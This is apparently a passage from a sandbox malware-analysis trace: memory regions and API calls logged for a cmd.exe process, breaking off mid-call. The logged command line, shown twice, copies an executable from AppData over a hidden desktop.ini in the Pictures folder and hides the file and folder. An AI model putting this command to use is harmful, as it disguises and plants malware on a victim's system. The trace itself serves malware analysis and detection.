(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17207 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17208 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 17209 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17432 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17433 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17434 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17435 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 17436 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 17437 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17438 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17439 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 17440 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17441 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17442 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17443 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17444 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17445 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17446 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 17447 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17448 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17449 start_va = 0x50000 end_va = 0x56fff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 17450 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 17451 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 17452 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 17453 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 17454 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17455 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 17456 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 255 os_tid = 0x8a8 [0145.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff04 | out: lpSystemTimeAsFileTime=0x18ff04*(dwLowDateTime=0x9082d8e0, dwHighDateTime=0x1d440a9)) [0145.252] GetCurrentProcessId () returned 0x954 [0145.252] GetCurrentThreadId () returned 0x8a8 [0145.252] GetTickCount () returned 0x2d44e [0145.252] QueryPerformanceCounter (in: lpPerformanceCount=0x18fefc | out: lpPerformanceCount=0x18fefc*=20204109109) returned 1 [0145.252] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0145.252] __set_app_type (_Type=0x1) [0145.252] __p__fmode () returned 0x76b331f4 [0145.253] __p__commode () returned 0x76b331fc [0145.253] SetUnhandledExceptionFilter 
(lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0145.253] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0145.253] GetCurrentThreadId () returned 0x8a8 [0145.253] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a8) returned 0x38 [0145.253] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0145.253] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0145.253] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.253] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0145.253] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe94 | out: phkResult=0x18fe94*=0x0) returned 0x2 [0145.253] VirtualQuery (in: lpAddress=0x18fecb, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.253] VirtualQuery (in: 
lpAddress=0x190000, lpBuffer=0x18fe64, dwLength=0x1c | out: lpBuffer=0x18fe64*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0145.253] GetConsoleOutputCP () returned 0x1b5 [0145.254] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.254] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.254] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.254] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.254] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.254] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0145.254] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.254] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0145.254] GetEnvironmentStringsW () returned 0x3404a0* [0145.255] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.255] GetEnvironmentStringsW () returned 0x3404a0* [0145.255] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x50, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: 
lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegCloseKey (hKey=0x40) returned 0x0 [0145.255] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ee04 | out: phkResult=0x18ee04*=0x40) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x40, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x4) 
returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x1, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x0, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x4, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x4) returned 0x0 [0145.255] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ee0c, lpData=0x18ee10, lpcbData=0x18ee08*=0x1000 | out: lpType=0x18ee0c*=0x0, lpData=0x18ee10*=0x9, lpcbData=0x18ee08*=0x1000) returned 0x2 [0145.255] RegCloseKey (hKey=0x40) returned 0x0 [0145.256] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0145.256] srand (_Seed=0x5b886373) [0145.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" [0145.256] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\"" [0145.256] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341c00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0145.256] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.256] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0145.256] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0145.256] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0145.256] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0145.256] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0145.256] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0145.256] GetEnvironmentStringsW () returned 0x3425f0* [0145.257] FreeEnvironmentStringsW (penv=0x3425f0) returned 1 [0145.257] 
GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.257] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0145.257] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0145.257] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0145.257] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0145.257] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0145.257] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0145.257] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0145.257] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fbd0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.257] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fbd0, lpFilePart=0x18fbcc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fbcc*="Desktop") returned 0x18 [0145.257] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.257] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.257] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 [0145.257] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f94c | out: lpFindFileData=0x18f94c) returned 0x340c80 [0145.258] FindClose (in: hFindFile=0x340c80 | out: hFindFile=0x340c80) returned 1 
[0145.258] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0145.258] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0145.258] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0145.258] GetEnvironmentStringsW () returned 0x3404a0* [0145.258] FreeEnvironmentStringsW (penv=0x3404a0) returned 1 [0145.258] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.258] GetConsoleOutputCP () returned 0x1b5 [0145.258] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0145.258] GetUserDefaultLCID () returned 0x409 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fd10, cchData=128 | out: lpLCData="0") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fd10, cchData=128 | out: lpLCData="1") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, 
cchData=32 | out: lpLCData="Fri") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0145.259] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0145.259] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0145.260] GetConsoleTitleW (in: lpConsoleTitle=0x330ac8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.260] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0145.260] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0145.261] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0145.261] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0145.261] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0145.261] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0145.261] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0145.261] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0145.261] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0145.263] _wcsicmp (_String1="del", _String2=")") returned 59 [0145.263] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0145.263] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0145.263] _wcsicmp (_String1="IF", _String2="del") returned 5 [0145.263] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0145.263] _wcsicmp (_String1="REM", _String2="del") returned 14 
[0145.263] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0145.265] _wcsicmp (_String1="type", _String2=")") returned 75 [0145.265] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0145.265] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0145.265] _wcsicmp (_String1="IF", _String2="type") returned -11 [0145.265] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0145.265] _wcsicmp (_String1="REM", _String2="type") returned -2 [0145.265] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0145.270] SetErrorMode (uMode=0x0) returned 0x0 [0145.270] SetErrorMode (uMode=0x1) returned 0x0 [0145.270] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3404a8, lpFilePart=0x18f4c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f4c4*="Desktop") returned 0x18 [0145.270] SetErrorMode (uMode=0x0) returned 0x1 [0145.270] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0145.270] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0145.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.275] GetLastError () returned 0x2 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.275] GetLastError () returned 0x2 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", 
fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0x342530 [0145.275] FindClose (in: hFindFile=0x342530 | out: hFindFile=0x342530) returned 1 [0145.275] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0xffffffff [0145.276] GetLastError () returned 0x2 [0145.276] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x18f240, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f240) returned 0x342530 [0145.276] FindClose (in: hFindFile=0x342530 | out: hFindFile=0x342530) returned 1 [0145.276] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0145.276] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0145.276] GetConsoleTitleW (in: lpConsoleTitle=0x18f738, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.299] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f5c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f688 | out: lpAttributeList=0x18f5c0, lpSize=0x18f688) returned 1 [0145.299] UpdateProcThreadAttribute (in: lpAttributeList=0x18f5c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f680, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f5c0, lpPreviousValue=0x0) returned 1 [0145.299] GetStartupInfoW (in: lpStartupInfo=0x18f57c | out: lpStartupInfo=0x18f57c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0145.299] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned 
